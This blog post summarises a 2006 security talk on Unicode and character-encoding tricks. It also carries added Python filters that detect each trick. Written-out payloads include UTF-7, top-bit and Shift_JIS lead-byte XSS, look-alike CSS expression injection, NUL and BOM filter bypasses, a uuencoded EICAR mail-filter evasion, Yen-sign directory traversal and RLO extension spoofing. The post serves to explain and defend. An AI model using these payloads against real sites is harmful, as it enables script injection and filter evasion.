Tuesday, December 19, 2006

[Security] Do that with Unicode!!

On Dec 9, 2006, in Hiroshima, "10 TEXT HACKS" was presented by Yosuke Hasegawa, who is also a Microsoft MVP for Windows Security.

He presented at Security Momiji (IT Security Workshop in Hiroshima).
The slides are at the link below (Japanese only):
-> http://openmya.hacker.jp/hasegawa/public/20061209/momiji.html

---

TEXT HACKS: ten useless techniques, one after another.

  1. HACK #1 XSS it! (UTF-7)
    1. Script written in UTF-7
      Ex) script in UTF-7
      +ADw-SCRIPT+AD4-alert('XSS');+ADw-+AC8-SCRIPT+AD4-
    2. When a page does not specify its encoding, Internet Explorer auto-detects content that looks like UTF-7 and decodes it as UTF-7.
      Ex) Google Search "404 not found" page (2005.12)
      IIS error page XSS, MS06-053 (2006.10)
    3. The encoding can be specified from outside the page.
      Ex) Google Search Appliance XSS (2006.11)
  2. HACK #2 more XSS it! (US-ASCII)
    1. Internet Explorer disregards the top bit of each byte in a 7-bit character set (e.g., US-ASCII or ISO-2022-JP).
      Ex) 0x73 and 0xF3 are both shown as "s" by IE when the charset is US-ASCII.
      s : 0x73 01110011
          0xF3 11110011
      0x3C and 0xBC are both shown as "<" by IE when the charset is US-ASCII.
      < : 0x3C 00111100
          0xBC 10111100
    2. This can bypass filters that detect meta characters.
      Ex) シscriptセalert(「XSS「)シ/scriptセ

      シ : 0xBC -> 0x3C with the top bit cleared -> same as <
      セ : 0xBE -> 0x3E with the top bit cleared -> same as >
      「 : 0xA2 -> 0x22 with the top bit cleared -> same as "

      Read as US-ASCII, this is "<script>alert("XSS")</script>".

  3. HACK #3 XSS by Japanese (multi-byte characters)
    1. A lead byte ("first byte") of Shift_JIS or EUC-JP can break the HTML structure.
      Put 0x82 (a Shift_JIS lead byte) right before the closing " (double quote), so the browser consumes the quote as the second byte of a two-byte character.
      ---
      <input type=text value="(0x82)"><br>
      <input type=text value=" onmouseover=alert('xss');(0x82)"><br>
      ---
      (Source: http://www.atmarkit.co.jp/fsecurity/rensai/hoshino10/hoshino02.html (Japanese only))

      Ex2) Yahoo Mail (2005.11)
      ---
      Content-Type: text/html; charset=GB2312
      Subject: example

      <span
      style='width:expr/*[0x81]*/*/ession(alert())'>
      exploited</span>
      ---

      Ex3) Hotmail (2006.8)
      ---
      Content-Type: text/html; charset=SHIFT_JIS
      Subject: example

      <font ></font><font face="
      onmouseover=alert() s=[0x81]">exploited</font>
      ---
  4. HACK #4 More more XSS (Do that with expression!)
    1. Internet Explorer accepts "expression( )" or "url( )" written with Unicode look-alike or double-byte (full-width) characters.
      ---
      Ex) Double byte
      <div style="{left:expression(alert('xss'))}">
      <div style="{background:URL(javascript:alert('xss'))}">

      Ex) Unicode
      Look-alike characters can be used to spell expression or url:
      R - U+0280 (ʀ)
      N - U+0274 (ɴ), U+207F (ⁿ)
      L - U+029F (ʟ)

      Hatena Diary (2005.12)
      Hotmail, Windows Live Mail (2006.11)
      SquirrelMail (2006.12)
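Added example (not from the presentation): why a filter for "expression(" or "url(" must fold look-alikes before matching. NFKC normalization maps full-width (double-byte) letters and U+207F to ASCII, but the small-capital letters listed above have no decomposition, so the code keeps an explicit confusable table that is assumed to cover only the letters named above; the sample style values are constructed from the payload shown above.

```python
# Added example (not from the presentation): fold look-alike characters before
# searching a style value for "expression(" or "url(". NFKC maps full-width
# ("double byte") letters and U+207F to ASCII, but the small-capital letters
# U+0280, U+0274 and U+029F have no decomposition and need an explicit table.
# Assumption: only the letters the presentation lists are in that table.
import re
import unicodedata

CONFUSABLES = str.maketrans({"\u0280": "r", "\u0274": "n", "\u029f": "l"})
DANGEROUS = re.compile(r"(expression|url)\s*\(", re.IGNORECASE)


def fold(value: str) -> str:
    """The ASCII form IE would recognise the value as."""
    return unicodedata.normalize("NFKC", value).translate(CONFUSABLES)


def raw_filter_hits(value: str) -> bool:
    """A filter that matches the string exactly as received."""
    return DANGEROUS.search(value) is not None


def folded_filter_hits(value: str) -> bool:
    """The same filter applied after folding."""
    return DANGEROUS.search(fold(value)) is not None


# Constructed samples based on the HACK #4 list: small-capital R, superscript n,
# and full-width letters (U+FF41..U+FF5A) standing in for ASCII letters.
SAMPLES = {
    "small_capital_r": "{left:exp\u0280ession(alert('xss'))}",
    "superscript_n": "{left:expressio\u207f(alert('xss'))}",
    "full_width": "{left:\uff45\uff58\uff50\uff52\uff45\uff53\uff53\uff49\uff4f\uff4e(alert('xss'))}",
}
```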
  5. HACK #5 more and more XSS (Do that with invisible characters)
    1. Internet Explorer ignores every null character in HTML.
      <s(0x00)cript>
    2. Internet Explorer treats 0x0B and 0x0C as a space in HTML.
      <script(0x0B)>
      <s (0x0C)onmouseover="...">

    3. Mozilla Firefox 1.5.0.4 and earlier versions ignore the BOM (U+FEFF; ZERO WIDTH NO-BREAK SPACE).
      <s(BOM)cript>
      1. MFSA 2006-42: Web site XSS using BOM on UTF-8 pages
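Added example (not from the presentation): server-side checks a filter can run on the raw response or mail bytes together with the declared charset, covering HACK #2 (top bit set in a 7-bit charset, which also applies to the mail bodies in HACK #6), HACK #3 (orphan multi-byte lead bytes) and HACK #5 (NUL, 0x0B, 0x0C). The function names and sample bodies are constructed here from the payloads shown above.

```python
# Added example (not from the presentation): server-side checks on the raw
# response (or mail) bytes plus the declared charset, for the HACK #2, #3,
# #5 and #6 tricks. Function names and sample bodies are constructed here.

SEVEN_BIT_CHARSETS = {"us-ascii", "iso-2022-jp"}
META_BYTES = b"<>\"'"
IGNORED_BY_IE = b"\x00\x0b\x0c"  # NUL is dropped, VT and FF act as a space

def seven_bit_view(data: bytes) -> bytes:
    """The bytes as a client that drops the top bit of every byte (IE, Outlook
    Express) reads a 7-bit charset: 0xBC becomes 0x3C, i.e. '<'."""
    return bytes(b & 0x7F for b in data)

def high_bit_offsets(data: bytes) -> list:
    """Offsets of bytes >= 0x80; none of them is legal in a 7-bit charset."""
    return [i for i, b in enumerate(data) if b & 0x80]

def invalid_sequence_offsets(data: bytes, charset: str) -> list:
    """Offsets where strict decoding in the declared multi-byte charset fails,
    e.g. a Shift_JIS lead byte 0x82 followed by '"' (not a valid trail byte).
    A lenient browser swallows the quote; a strict decoder reports it."""
    offsets, start = [], 0
    while start < len(data):
        try:
            data[start:].decode(charset)
            break
        except UnicodeDecodeError as err:
            offsets.append(start + err.start)
            start += err.start + 1  # skip the orphan lead byte and continue
    return offsets

def html_meta_leaks(data: bytes, charset: str) -> dict:
    """Report each way a meta character could reach the client unescaped."""
    charset = charset.lower()
    report = {"high_bit": [], "invalid_sequences": [], "folded_meta": [],
              "control_bytes": [i for i, b in enumerate(data) if b in IGNORED_BY_IE]}
    if charset in SEVEN_BIT_CHARSETS:
        report["high_bit"] = high_bit_offsets(data)
        folded = seven_bit_view(data)
        report["folded_meta"] = [i for i, b in enumerate(folded)
                                 if b in META_BYTES and data[i] != b]
    else:
        report["invalid_sequences"] = invalid_sequence_offsets(data, charset)
    return report

# Constructed samples: the HACK #2 katakana payload as bytes 0xBC/0xBE/0xA2,
# the HACK #3 input tag with an orphan 0x82 lead byte, and a HACK #5 NUL.
KATAKANA_SCRIPT = b"\xbcscript\xbealert(\xa2XSS\xa2)\xbc/script\xbe"
ORPHAN_LEAD = b'<input type=text value="\x82"><br>'
NUL_IN_TAG = b"<s\x00cript>"
```

A body declared as a 7-bit charset with any entry in high_bit, or a multi-byte body with any entry in invalid_sequences, should be rejected before it is ever served.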
  6. HACK #6 bypass a mail content filter.
    1. Outlook Express also disregards the top bit of 7-bit character sets such as US-ASCII or ISO-2022-JP.
      MIME-Version: 1.0
      
      Content-Type: text/plain; charset=US-ASCII
      Content-Transfer-Encoding: 7bit

      This is test mail

      begin 644 eicar.com
      ヘカ#5/(5`E0$%06S1<4%i8-30h4%xi-t-#*3=])
      $5)0T%2+5-404Y$05)$+4%.
      75$E625)54RU415-4+49)3$4A)$@K2"I#
      `
      end

      eicar.com (the virus test file) is uuencoded and the top bit of the bytes is set.
  7. HACK #7 Create look-alike file names (do that with zero-width characters)
    1. By putting zero-width or control characters into part of a file name, two different names can be made to look the same.
      1. Invisible characters.
        - U+200B ( ZERO WIDTH SPACE )
        - U+200C ( ZERO WIDTH NON-JOINER )
        - U+200D ( ZERO WIDTH JOINER )
        - U+FEFF ( ZERO WIDTH NO-BREAK SPACE )
        - U+202A ( LEFT-TO-RIGHT EMBEDDING )
  8. HACK #8 Directory Traversal (do that with the Yen sign)
    1. Unicode has both the backslash (U+005C) and the Yen sign (U+00A5).
    2. The Yen sign (U+00A5) can be used in a file name.
    3. When the Yen sign (U+00A5) is converted to Shift_JIS it becomes the backslash (0x5C).
      1. Therefore, in an application that does not handle file names as Unicode, directory traversal can happen.
        Ex) A DoS can occur in an application that recursively enumerates files
        if there is a folder named like "..\" (".." followed by a Yen sign).
        Ex)
        - Namazu 2.0.15 (for Windows) prior
        - Hyper Estraier Version 1.0.2 (for Windows) prior
        - Becky! Ver.2.22 prior
  9. HACK #9 A registry key that appears not to exist but does (Do that with zero-width characters)
    1. Registry entries can use Unicode, so zero-width characters can be used to camouflage a key name, the same as the file name trick in HACK #7.
  10. HACK #10 Camouflage the file extension (do that with Bidi)
    1. Unicode has a "bidirectional algorithm" that displays characters right-to-left.
      When U+202E (RIGHT-TO-LEFT OVERRIDE; RLO) is put into a file name, the characters after the RLO are shown in reverse order.
      1. Ex) RLO in a file name
        Real file name: this-(U+202E)txt.exe
        File name shown: this-exe.txt
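Added example (not from the presentation): a file-name check that rejects the tricks in HACK #7 (zero-width characters), HACK #8 (Yen sign acting as a backslash after Shift_JIS conversion) and HACK #10 (RLO hiding the real extension). The bidi rendering is approximated by reversing the text after the RLO, which matches the example above but is not the full Unicode algorithm; the function names are assumptions of this example.

```python
# Added example (not from the presentation): a file-name check covering HACK #7
# (zero-width characters), HACK #8 (Yen sign read as a backslash by a Shift_JIS
# file API) and HACK #10 (RLO hiding the real extension).
import unicodedata

YEN_SIGN = "\u00a5"  # U+00A5, becomes 0x5C in Shift_JIS
RLO = "\u202e"       # U+202E RIGHT-TO-LEFT OVERRIDE

def invisible_characters(name: str) -> list:
    """(offset, code point, Unicode name) of every format (Cf) or control (Cc)
    character: this catches U+200B..U+200D, U+FEFF, U+202A and U+202E."""
    return [(i, "U+%04X" % ord(ch), unicodedata.name(ch, "<unnamed>"))
            for i, ch in enumerate(name)
            if unicodedata.category(ch) in ("Cf", "Cc")]

def components(name: str) -> list:
    """Split as a non-Unicode (Shift_JIS) file API would: the Yen sign turns
    into 0x5C, so it separates directories exactly like a backslash."""
    return name.replace(YEN_SIGN, "\\").replace("/", "\\").split("\\")

def is_traversal(name: str) -> bool:
    return ".." in components(name)

def displayed_name(name: str) -> str:
    """Approximation of what a bidi-aware UI renders: after an RLO the rest
    of the name (plain Latin text assumed) appears reversed."""
    head, sep, tail = name.partition(RLO)
    return head + tail[::-1] if sep else name

def real_extension(name: str) -> str:
    """The extension the OS acts on: after the last '.' of the stored name."""
    stored = "".join(ch for ch in name if unicodedata.category(ch) != "Cf")
    return stored.rsplit(".", 1)[1] if "." in stored else ""

def check_file_name(name: str) -> list:
    """Reasons to reject the name; an empty list means it is acceptable."""
    problems = ["%s %s at offset %d" % (cp, uname, i)
                for i, cp, uname in invisible_characters(name)]
    if is_traversal(name):
        problems.append("'..' component via backslash or Yen sign")
    shown, real = displayed_name(name), real_extension(name)
    if RLO in name and not shown.endswith("." + real):
        problems.append("displayed as %r but the extension is .%s" % (shown, real))
    return problems
```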

  11. Summary
    1. Permitted characters are a managed white list.
    2. Inspect character strings after they have been normalized.
    3. Don't transform them again after normalization.
    4. Don't be fooled by Unicode look-alikes.
    5. Check the behavioral differences between browsers and MUAs (if possible).
  12. Reference
    1. Hasegawa's Blog (Japanese only)
    2. XSS Vulnerability in UTF-7 encoded tag strings (Slashdot Japan) (Japanese only)
    3. sla.ckers.org web application security forum :: Full Disclosure :: Widespread XSS for Google Search Appliance
    4. ha.ckers.org web application security lab - Archive » US-ASCII XSS part 2
    5. ha.ckers.org web application security lab - Archive » Yahoo Vulnerable To Selected Encoding XSS
    6. Pitfall of multi byte (Japanese only)
    7. Bypassing script filters with variable-width encodings
    8. [openmya:035806] Cause of XSS by excessive detection of "Expression" in IE
    9. MFSA 2006-42: Web site XSS using BOM on UTF-8 pages
    10. [Namazu-devel-ja 944] Japanese full-text search system Namazu 2.0.15 release
